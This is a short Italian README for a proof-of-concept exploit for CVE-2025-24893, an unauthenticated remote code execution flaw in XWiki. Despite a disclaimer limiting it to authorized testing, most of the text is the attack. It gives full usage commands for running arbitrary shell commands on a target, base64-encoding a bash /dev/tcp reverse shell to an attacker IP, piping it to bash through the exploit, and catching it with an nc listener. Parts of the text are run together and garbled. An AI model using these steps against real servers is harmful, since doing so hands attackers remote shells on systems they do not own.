
Exploit proof-of-concept per CVE-2025-24893 che consente l'esecuzione remota di codice non autenticata su XWiki con comandi shell arbitrari e iniezione di reverse shell tramite Python.
Un proof-of-concept (PoC) aggiornato per CVE-2025-24893, una vulnerabilità critica di RCE non autenticata in XWiki. Questa versione migliora l'originale consentendo l'esecuzione arbitraria di comandi shell e l'iniezione pulita di reverse shell.
Di: HexHunter404
Questo codice è fornito solo per scopi educativi e di test di penetrazione autorizzati.
Non utilizzarlo su sistemi che non possiedi o per i quali non hai esplicita autorizzazione a testare.
bash -c '<command>'/xwiki ed evita i loop di reindirizzamentopython3 CVE-2025-24893-PoC.py -u http://<target>/xwiki -c "<command>"
. Codifica in Base64 la tua reverse shell
echo "bash -i >& /dev/tcp/[IP]/4444 0>&1" | base64
. Inviala tramite il PoC
python3 CVE-2025-24893-PoC.py -u [URL] -c "echo [Base64 Payload] | base64 -d | bash"
. Configura il tuo listener
nc -lvnp 4444
Se il tentativo ha successo, otterrai una shell.